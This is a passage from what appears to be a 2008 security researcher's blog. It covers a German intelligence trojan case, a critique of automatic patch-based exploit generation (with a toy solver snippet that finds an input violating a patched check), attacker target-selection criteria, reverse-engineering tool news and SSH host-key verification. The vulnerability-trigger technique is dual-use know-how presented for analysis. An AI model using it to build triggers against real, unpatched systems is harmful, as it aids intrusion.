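    s_i(t) : \text{skill of person } i \text{ at time } t, \qquad s_i'(t) \propto \text{talent}_i \cdot \text{effort}_i(t)
    E_i(T) = \int_{t_0}^{T} s_i(t)\, dt : \text{the accumulated "area", i.e. experience and intuition}
    \text{Even if } s_{\mathrm{me}}(T) \ge s_{\mathrm{them}}(T) \text{ from now on, } E_{\mathrm{me}}(T) < E_{\mathrm{them}}(T) \text{ can hold for years.}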

Anyhow, the one thing that I tell myself to get over this is that I was the youngest man in the room by a gap of about 10 years. So I'd like to tell myself that, given that extra 10 years, I could actually compete.

There's one caveat though: There were several women that were younger than me, and the delta to them was no less than to any of the men.

I apologize for the excessive vagueness of this post.
Travelling & Dopplr

Btw, how many people that travel a lot are using Dopplr ? It seems like a somewhat clever idea (as I am stuck in silly hotel rooms a lot and often wonder whether anyone I know is nearby).

Thursday, June 12, 2008

Zynamics Canada Tour, Complex analysis and my stupidity

Hey all -- I know I've been mostly quiet the last weeks. This was principally due to the combination of lots of work at work (the secretary is on vacation) and me having to take a couple of exams.

I can proudly proclaim that I passed my complex analysis / Riemann surfaces exam today. I am not so proud of my performance -- some of the mistakes I made deserve getting my shins kicked. The final grade was pretty ok, I just really hate looking stupid in front of people I deem smart.

Anyhow, on to other news:

It's RECon time, and while I cannot attend due to a number of other obligations :-( our BinNavi lead developer Sebastian is attending. So if anyone that is attending RECon would like to have a demo of BinNavi v1.5 OR discuss the cool new things that BinNavi v2 will bring, make sure to drop info@zynamics.com a mail so that we can schedule something.

Monday, April 28, 2008

There's a lot of hoopla in the German media about the German SIGINT folks having to admit that they trojanized Afghanistan's Ministry of Commerce and Industry.

The entire situation is hilarious, as Mrs. Merkel criticized the Chinese for having sponsored hacking sprees into German government institutions last year - I guess she is not overly happy about all this stuff hitting the press now.

The first article is actually quite interesting. It is terribly hard to get any information about InfoSec stuff in Europe (we'd need a Mr. Bamford around here I fear), so the article is really amongst the only data points to be found.
In 2006, Division 2 consisted of 13 specialist departments and a management team (Department 20A), employing about 1,000 people. The departments are known by their German acronyms, like MOFA (mobile and operational telecommunications intelligence gathering), FAKT (cable telecommunications intelligence gathering) and OPUS (operational support and wiretapping technology).
So there are people working on this sort of stuff in Germany after all. I wonder why one never meets any at any security conferences - they either have excellent covers or no budget to travel to any conferences.

Another amusing tidbit:
Perhaps it will never be fully clear why the BND chose this particular ministry and whether other government agencies in Kabul were also affected -- most of the files relating to the case have apparently been destroyed.
I find the regularity with which important files regarding espionage or KSK misbehavior are destroyed or lost a little bit ... peculiar.

There's a bit in the article about emails that have a .de domain ending being automatically discarded by their surveillance tools. Hilarious.

The issue came to light because during the surveillance a German reporter had her email read, too (she was communicating with an Afghan official whose emails were being read). This is a violation of the freedom of the press here in Germany, and normally, the BND should've dealt with this by reporting their breach to the parliamentary subcommittee for intelligence oversight, which they somehow didn't. A whistleblower inside the BND then sent a letter to a bunch of politicians, making the situation public.

It's always hard to make any judgements in cases as these, as the public information is prone to being unreliable, but it is encouraging that a whistleblower had the guts to send a letter out. I am a big fan of the notion that everyone is personally responsible for his democracy.

The topic of intelligence and democracies is always difficult: If one accepts the necessity of intelligence services (which, by their nature, operate in dodgy terrain, and which, due to their requirements for secrecy, are difficult to control democratically), then one has to make sure that parliamentary oversight works well. This implies that the intelligence agencies properly inform the parliamentary committee, and it also implies that the parliamentary committee keeps the information provided confidential.

There seem to be only two ways to construct parliamentary oversight in a democracy: Pre-operation or post-operation. Pre-operation would have the committee approve of any potentially problematic operation ahead of it being performed. If things go spectacularly wrong, the fault is to be blamed on the committee. The problem with this is secrecy: Such a committee is big, and for operational security it seems dangerous to disseminate any information this widely.

This appears to be the reason why most democracies seem to opt for a "post-operation" model: The services have in-house legal experts, and these legal experts judge the 'legality' of a certain operation. Then the operation takes place, and the committee is notified after the fact if something goes spectacularly wrong.

The trouble with this model appears to be that the intelligence service doesn't have much incentive to report any problems: They can always hope the problem goes away by itself. It is the higher-ups in the hierarchy that have to report to the committee, and they are the ones whose heads will roll if things go wrong.

It appears to be an organisational problem: Information is supposed to flow upwards in the organisational hierarchy, but at the same time, the messenger might be shot. This is almost certain to lead to a situation where important information is withheld.

I guess it's any manager's nightmare that his "subordinates" (horrible word -- this should mean "the guys doing the work and understanding the issues") in the organisation start feeding him misinformation. Organisations start rotting quickly if the bottom-up flow of information is disrupted. The way things are set up here in Germany seems to encourage such disruptions. And if mid-level management is failing but blocks this information from reaching upper management, the guys in the trenches have not only the right, but the duty to send a letter to upper management.

I have no clue if there is any country that has these things organized in a better way -- it seems these problems haunt most democracies.

Anyhow, if anyone happens to stumble across the particular software used in this case, I think it would make for a terribly interesting weekend of reverse engineering -- I am terribly curious what sort of stuff the tool was capable of :)

Cheers,
Halvar

Friday, April 25, 2008

Patch obfuscation etc.

So it seems the APEG paper is getting a lot of attention these days, and some of the conclusions that are (IMO falsely) drawn from it are:
  • patch time to exploit is approaching zero
  • patches should be obfuscated
Before I go into details, a short summary of the paper:
  1. BinDiff-style algorithms are used to find changes between the patched and unpatched version
  2. The vulnerable locations are identified.
  3. Constraint formulas are generated from the code via three different methods:
    1. Static: A graph of all basic blocks on code paths between the vulnerability and the data input into the application is generated, and a constraint formula is generated from this graph.
    2. Dynamic: An execution trace is taken; if the vulnerability occurs on a program path that one can already execute, constraints are generated from this path.
    3. Dynamic/Static: Instead of going from data input to target vulnerability (as in the static approach), one can use an existing path that comes "close" to the vulnerability as starting point from which to proceed with the static approach.
  4. The (very powerful) solver STP is used for solving these constraint systems, generating inputs that exercise a particular code path that triggers the vulnerability.
  5. A number of vulnerabilities are discussed which were successfully triggered using the methods described in the paper
  6. The conclusion is drawn that within minutes of receiving a patch, attackers can use automatically generated exploits to compromise systems.
In essence, the paper implements automated input crafting. The desire to do this has been described before -- Sherri Sparks' talk on "Sidewinder" (using genetic algorithms to generate inputs to exercise a particular path) comes to mind, and many discussions about generating a SAT problem from a particular program path to be fed into a SAT solver (or any other solver for that matter).

What the APEG paper describes is impressive -- using STP is definitely a step forwards, as it appears that STP is a much superior solver to pretty much everything else that's publically available.
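
To make the "path condition to concrete input" step tangible, here is a toy example. The paper uses STP; the snippet below uses the Python bindings of a different modern solver (Z3), purely because they are convenient for illustration, and every constraint and variable name in it is made up -- think of a patch that newly rejects length fields above 512.

    # Toy illustration of "path condition -> concrete vulnerability trigger".
    # The APEG paper uses STP; Z3 is used here only for illustration, and all
    # constraints and variable names are invented.
    from z3 import BitVec, Solver, UGT, URem, sat

    length = BitVec("attacker_len", 32)    # attacker-controlled length field

    s = Solver()
    s.add(UGT(length, 8))                  # earlier branch: record must be accepted at all
    s.add(URem(length, 4) == 0)            # some alignment check on the same path
    s.add(UGT(length, 512))                # the check the patch *added* must be violated

    if s.check() == sat:
        print("length value that reaches the vulnerable copy:", s.model()[length])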

It is equally important to keep the limitations of this approach in mind - people are reacting in a panicked manner without necessarily understanding what this can and cannot do.
  1. Possible NP-hardness of the problem. Solving for a particular path is essentially an instance of SAT, and we know that this can be NP-hard. It doesn't have to be, but the paper indicates many formulas STP cannot solve in reasonable time. While this doesn't imply that these formulas are in fact hard to solve, it shows how much this depends on the quality of your solver and the complexity of the formulas that are generated.
  2. The method described in the paper does not generate exploits. It triggers vulnerabilities. Anyone who has worked on even a moderately complex issue in the past knows that there is often a long and painful path between triggering an overflow and making use of it. The paper implies that the results of APEG are immediately available to compromise systems. This is, plainly, not correct. If APEG is successful, the results can be used to cause a crash of a process, and I refuse to call this a "compromise". Shooting a foreign politician is not equal to having your intelligence agency compromise him.
  3. Semantic issues. All vulnerabilities for which this method worked were extremely simple. The actual interesting IGMP overflow Alex Wheeler had discovered, for example, would not be easily dealt with by these methods -- because program state has to be modified for that exploit in a non-trivial way. In essence, a patch can tell you that "this value YY must not exceed XX", but if YY is not direct user data but indirectly calculated through other program events, it is not (yet) possible to automatically set YY.
So in short one could say that APEG will succeed in triggering a vulnerability if the following conditions are met:
  1. The program path between the vulnerability and code that one already knows how to execute is comparatively simple
  2. The generated equation systems are not too complex for the solver
  3. The bug is "linear" in the sense that no complicated manipulation of program state is required to trigger the vulnerability
This is still very impressive stuff, but it reads a lot less dramatic than "one can generate an exploit automatically from an arbitrary patch". All in all, great work, and I do not cease to be amazed by the results that STP has brought to code analysis in general. It confirms that better solvers ==> better code analysis.

What the paper gets wrong IMO are the conclusions about what should be done in the patching process. It argues that because "exploits can be generated automatically, the patching process needs fixing". This is a flawed argument, as ... uhm ... useful exploits can't (yet) be generated automatically. Triggering a vulnerability is not the same as exploiting it, especially under modern operating systems (due to ASLR/DEP/Pax/GrSec).

The paper proposes a number of ways of fixing the problems with the current patching process:

1. Patch obfuscation. The proposal that zombie-like comes back every few years: Let's obfuscate security patches, and all will be good. The problems with this are multifold, and quite scary:
    1. Obfuscated executables make debugging for MS ... uhm ... horrible, unless they can undo it themselves
    2. Obfuscated patches remove an essential liberty for the user: The liberty to have a look at a patch and make sure that the patch isn't in fact a malicious backdoor.
    3. We don't have good obfuscation methods that do not carry a horrible performance impact.
    4. Obfuscation methods have the property that they need to be modified whenever attackers break them automatically. The trouble is: Nobody would know if the attackers have broken them. It is thus safe to assume that after a while, the obfuscation would be broken, but nobody would be aware of it.
    5. Summary: Obfuscation would probably a) impact the user by making his code slower and b) impact the user by disallowing him from verifying that a patch is not malicious and c) create support nightmares for MS because they will have to debug obfuscated code. At the same time, it will not provide long-term security.
2. Patch encryption: Distributing encrypted patches, and then finally distributing the encryption key so all systems update at once. This proposal seems to assume that bandwidth is the limiting factor in patch installation, which, as far as I can tell, it is not. This proposal does less damage than obfuscation though -- instead of creating certain disaster with questionable benefit, this proposal just "does nothing" with questionable benefit.

3. Faster patch distribution. A laudable goal, nothing wrong with this.

Anyhow, long post, short summary: The APEG paper is really good, but it uses confusing terminology (exploit ~= vulnerability trigger) which leads to its impact on patch distribution being significantly overstated. It's good work, but the sky isn't falling, and we are far away from generating reliable exploits automatically from arbitrary patches. APEG does generate usable vulnerability triggers for vulnerabilities of a certain form. And STP-style solvers are important.

I have not been blogging nor following the news much in recent months, as I am frantically trying to get all my university work sorted. While I have been unsuccessful at getting everything sorted on the schedule I had set myself, I am making progress, and expect to be more visibly active again in fall.

Today, I found out that my blog entry on the BlueHat blog drew more feedback than I had thought. I am consistently surprised that people read the things that I write.

Reading my blog post again, I find it so terse I feel I have to apologize for it and explain how it ended up this way. It was the last day of BlueHat, and I was very tired. Those that know me well know that my sense of humor is difficult at the best of times. I have a great talent for sounding bitter and sarcastic when in fact I am trying to be funny and friendly (this has led to many unfortunate situations in my life :-). So I sat down and tried to write a funny blog post. I was quite happy with it when it was done.

In an attack of unexpected sanity, I decided that someone else should read over the post, so I asked Nitin, a very smart (and outrageously polite) MS engineer. He read it, and told me (in his usual very polite manner) ... that the post sucked. I have to be eternally thankful to him, because truly, it did. Thanks Nitin !

So I deleted it, and decided to write down just the core points of the first post. I removed all ill-conceived attempts at humor, which made the post almost readable. It also limited the room for potential misunderstandings.

I would like to clarify a few things that seem to have been misunderstood though:

I did not say "hackers have to" move to greener pastures. I said "hackers will move to greener pastures for a while". This is a very important distinction. In order to clarify this, I will have to draw a bit of a larger arc:

Attackers are, at their heart, opportunists. Attacks go by the old basketball saying about jumpshot technique: "Whoever scores is right". There is no "wrong" way of compromising a system. Success counts, and very little else.

When attackers pick targets, they consider the following dimensions:
  • Strategic position of the target. I will not go into this (albeit important) point too deeply. Let's just assume that, since we're discussing Vista (a desktop OS), the attacker has made up his mind and wishes to compromise a client machine.
  • Impact by market share: The more people you can hack, the better. A widely-installed piece of software beats a non-widely installed piece of software in most cases. There are many ways of estimating market share (personal estimates, Gartner reports, internet-wide scans etc.).
  • Wiggle Room: How many ways are there for the attacker to interact with the software ? How much functionality does the software have that operates on potentially attacker-supplied data ? If there are many ways to interact with the application, the odds of being able to reach vulnerable code locations -- and of turning a bug into a usable attack -- are greatly increased. Perhaps the more widely used term is "attack surface", but that term fails to convey the importance of "wiggle room" for exploit reliability. Any interaction with the program is useful.
  • Estimated quality of code: Finding useful bugs is actually quite time consuming. With some experience, a few glances at the code will give an experienced attacker some sort of "gut feeling" about the overall quality of the code.
From these four points, it is clear why IE and MSRPC got hammered so badly in the past: They pretty much had optimal scores on Impact -- they were everywhere. They provided plenty of "Wiggle Room": IE with client-side scripting (yay!), MSRPC through the sheer number of different RPC calls available. The code quality was favourable to the attacker up until WinXP SP2, too.

MS has put more money into SDL than most other software vendors. This holds true both in absolute and in relative terms. MS is in a very strong position economically, so they can afford things other vendors (who, by contrast, are exposed to market forces) cannot.

The code quality has improved markedly, decreasing the score on the 4th dimension. Likewise, there has been some reduction in attack surface, decreasing the score on the 3rd dimension. This is enough to convince attackers that their time is better spent on 'weaker' targets. The old chestnut about "you don't have to outrun the bear, you just have to outrun your co-hikers" holds true in security more than anywhere else.

In the end, it is much more attractive to attack Flash (maximum score on all dimensions) or any other browser plugins that are widely used.

I stand by my quote that "Vista is arguably the most secure closed-source OS available on the market".

This doesn't mean it's flawless. It just means it's more secure than previous versions of Windows, and more secure than OS X.

There was a second part to my blog post, where I mentioned that attackers are waiting for MS to become complacent again. I have read that many people inside Microsoft cannot imagine becoming complacent on security again. While I think this is true on the engineering level, it is imaginable that security might be scaled down by management.

The sluggish adoption of Vista by end-users is a clear sign that security does not necessarily sell. People buy features, and they cannot judge the relative security of the system. It is thus imaginable that people concerned with the bottom line decide to emphasize features over security again -- in the end, MS is a business, and the business benefits of investing in making code more secure have yet to materialize.

We'll see how this all plays out :-)

Anyhow, the next BlueHat is coming up. I won't attend this time, but I am certain that it will be an interesting event.

Wednesday, April 02, 2008

My valued coworker, SP, has just released his "pet project", Hexer. Hexer is a platform-independent Java-based extensible hex editor and can be downloaded under http://www.zynamics.com/files/Hexer-1_0_0.rar

It's also a good idea to visit his blog where he'll write more about its features and capabilities.

Tuesday, April 01, 2008

Oh, before I forget: Ero & I will be presenting our work on structural malware classification at RSA next week. If anyone wishes to schedule a meeting/demo of any of our things (VxClass/BinDiff/BinNavi), please do not hesitate to contact info@zynamics.com.


Some small eye candy: The screenshot shows BinNavi with our intermediate representation (REIL) made visible. While REIL is still very beta-ish, it should be a standard (and accessible) part of BinNavi at some point later this year.

Having a good IR which properly models side effects is a really useful thing to have: The guys over at the BitBlaze project at Berkeley have shown some really useful things that can be done using a good IR and a good constraint solver :-). I am positively impressed by several papers they have put out.

I also can't wait to have more of this sort of stuff in BinNavi :-).
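To illustrate what "properly modelling side effects" means, here is a toy, REIL-inspired lowering of a single x86 instruction. This is purely my own simplified illustration -- neither the actual REIL instruction set nor anything BinNavi emits -- but it shows the idea: the flag updates that x86 performs implicitly become explicit operations that an analysis or solver can reason about.

# Toy, REIL-inspired lowering of "add eax, ebx" into explicit micro-ops.
# My own simplification for illustration, not actual BinNavi/REIL output.
def lower_add(dst, src):
    """Return (mnemonic, operand1, operand2, result) tuples for dst += src."""
    return [
        ("add",  dst,  src,          "t0"),  # t0 = dst + src, held in a wider temporary
        ("and",  "t0", "0xffffffff", dst),   # truncate the result back to 32 bit
        ("bsh",  "t0", "-32",        "t1"),  # shift bit 32 (the carry) down ...
        ("and",  "t1", "0x1",        "CF"),  # ... and make the carry flag explicit
        ("bisz", dst,  "",           "ZF"),  # ZF = 1 if the result is zero, else 0
    ]

for micro_op in lower_add("eax", "ebx"):
    print(micro_op)

Once everything, flags included, is spelled out like this, constraint-solver tricks of the kind mentioned above have something uniform to chew on.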
Conspiracy theory of the day:

Like everyone else, I am following the US primaries, and occasionally discussing the implications of the developments for the wider world with my brother. He is usually good for some counter-intuitive insights into things, and described to me a "conspiracy theory" that I find amusing/interesting enough to post here.

Please be aware that the following is non-partisan: I do not really know whether I'd prefer Mrs Clinton, Mr Obama or Mr McCain in the White House, and this post is not intended to weigh in on either side.

I was a bit puzzled as to why Mrs Clinton is still in the primary race even though her mathematical odds of winning the Democratic nomination seem slim. The conspiracy theory explaining this is the following:

The true goal for Mrs Clinton is now 2012, not 2008. If Mr Obama wins the nomination _and_ the presidency, Mrs Clinton will very likely not become president in her lifetime. On the other hand: if she manages to damage Mr Obama badly enough that Mr McCain enters the White House, she has good cards to win the Democratic nomination in 2012, and Mr McCain is unlikely to serve a second term (given his age).

It's an interesting hypothesis. Anyhow, I should really get to sleep.

Tuesday, March 11, 2008

A short real-life story on why cryptography breaks:

One of the machines that I am using is a vhost hosted at a German hosting provider called "1und1". Clearly, I am accessing this machine using ssh. So a few weeks ago, to my surprise, my ssh warned me about the host key having changed.

Honored by the thought that someone might go to the effort of mounting a man-in-the-middle attack on this particular box, my rational brain told me that I should call the tech support of the hosting provider first and ask whether any event might've led to a change in keys.

After a rather lengthy interaction with the tech support (who first tried to brush me off by telling me to "just accept the new key"), I finally got them to tell me that they upgraded the OS and that the key had changed. After about 20 minutes of discussion, I finally got them to read the new key to me over the phone, and all was good.

Then, today, the warning cropped up again. I called tech support, a bit annoyed by these frequent changes. My experience was less than stellar - the advice I received was:
  1. "Just accept the new key"
  2. "The key is likely going to change all the time due to frequent relocations of the vhost so you should always accept it"
  3. "No, there is no way that they can notify me over the phone or in a signed email when the key changes"
  4. "It is highly unlikely that any change that would notify you would be implemented"
  5. "If I am concerned about security, I should really buy an SSL certificate from them" (wtf ??)
  6. "No, it is not possible to read me the key fingerprint over the phone"
The situation got better by the minute. After I told them that last time the helpful support had at least read me the fingerprint over the phone, the support person asked how I could be sure that my telephone call hadn't been man-in-the-middled...

I started becoming slightly agitated at this point. I will speak with them again tomorrow, perhaps I'll be lucky enough to get to 3rd-level support instead of 2nd level. Hrm. As if "customer service" were a computer game, with increasingly difficult levels.

So. Summary: 1und1 seems to think crypto is useless and we should all use telnet. Excellent :-/
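For anyone stuck in the same conversation: the fingerprint the provider should be able to read out over the phone can be computed locally from the server's public host key file. A small sketch (the script name and file name below are just examples of mine):

# Compute OpenSSH-style fingerprints of a public host key, so they can be
# compared against whatever the provider reads out over the phone.
# Usage (illustrative): python fingerprint.py ssh_host_rsa_key.pub
import base64
import hashlib
import sys

def fingerprints(pubkey_line):
    """Return (md5_hex, sha256_b64) fingerprints of an OpenSSH .pub key line."""
    # A .pub file looks like "ssh-rsa AAAAB3Nza... comment"; the fingerprint
    # is computed over the base64-decoded key blob in the second field.
    blob = base64.b64decode(pubkey_line.split()[1])
    md5_fp = ":".join("%02x" % byte for byte in hashlib.md5(blob).digest())
    sha256_fp = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return md5_fp, "SHA256:" + sha256_fp

if __name__ == "__main__":
    md5_fp, sha256_fp = fingerprints(open(sys.argv[1]).read())
    print(md5_fp)
    print(sha256_fp)

Of course this only helps if the provider is willing to read the fingerprint of the new key out over a channel that is not the SSH connection itself -- which was exactly the sticking point.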

Friday, March 07, 2008


Hey all,

we released BinNavi v1.5 last week. Normally, I'd write a lot of stuff here about the new features and all, but this will have to wait for a few days -- I am very tied up with some other work.

With the v1.5 release, we have added disassembly exporters that export from both OllyDbg and ImmunityDbg to our database format -- this means that Navi can now use disassemblies generated from those two debuggers, too. The screenshot above is BinNavi running on Ubuntu with a disassembly exported from the Windows VM that we are debugging into.

Anyhow, the real reason for this post is something completely different: We don't advertise this much on our website, but our tools are available in a sort of 'academic program':

If you are currently enrolled as a full-time student at a university and have an interesting problem you'd like to use our tools for, you can get a license of our tools (Diff/Navi) for a very moderate amount of money. All you have to do is:
  • Contact us (info@zynamics.com) with your name/address/university etc.
  • Explain what project you'd like to work on with our tools
  • Sign an agreement that you will write a paper about your work (after it's done) that we can put on our website
Oh, and you of course have to do the work then and write the paper :-)
Anyhow, I have to get back to work. Expect more posts from me later this year -- things are very busy for me at the moment.

Cheers,
Halvar

Tuesday, February 12, 2008

Hey all,

We will be releasing BinNavi v1.5 next week -- and I can happily say that we will have many cool improvements that I will blog about next week, once it is out.

Pictures often speak louder than words, so I'll post some of them here:

http://www.zynamics.com/files/navi15.1.png
http://www.zynamics.com/files/navi15.2.png
http://www.zynamics.com/files/navi15.3.png
http://www.zynamics.com/files/tree_lookup.jpg

A more detailed list of new features will be posted next week.

VxClass is making progress as well -- but more on this next week.

If there's anyone interested in our products (BinDiff, BinNavi, VxClass) in the DC area, I should be free to meet & do a presentation on the products next week.

Cheers,
Halvar

Tuesday, January 08, 2008

Happy new year everyone.

In June 2006 Dave Aitel wrote on Dailydave that "wormable bugs" are getting rarer. I think he is right, but this month's Patch Tuesday brings us a particularly cute bug.

I have created a small shockwave film and uploaded it to
http://www.zynamics.com/files/ms08001.swf

Enjoy ! :-)

In other news: We'll be posting screenshots of BinNavi v1.5 (due out in February) and the current VxClass version in the next two weeks - they are coming along nicely.

Cheers,
Halvar